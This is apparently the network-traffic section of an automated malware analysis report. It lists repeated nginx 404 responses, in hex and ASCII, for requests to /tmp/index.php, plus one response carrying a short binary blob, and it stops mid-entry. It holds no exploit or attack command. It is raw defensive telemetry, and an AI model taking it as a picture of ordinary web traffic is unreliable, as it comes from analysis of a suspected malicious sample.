                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:43 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:44 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:46 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:49 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:51 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:54 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:57 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:27:58 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:28:00 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:28:01 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 00 00 d8 80 d7 bd 9d d9 a1 98 be 23 cd c5 88 81 99 8b 5c 36 59 39 08 a5 6c 5f b5 ac 17 bd cf b4 fe 6d 9f 3d d4 a1 72 0a 41 c2 8f 97 cb Data Ascii: #\6Y9l_m=rA
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:28:04 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:28:05 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr></body></html>
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.0Date: Thu, 03 Oct 2024 21:28:07 GMTContent-Type: text/html; charset=utf-8Connection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 74 6d 70 2f 69 6e 64 65 78 2e 70 68 70 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 20 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0d 0a 3c 68 72 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /tmp/index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the 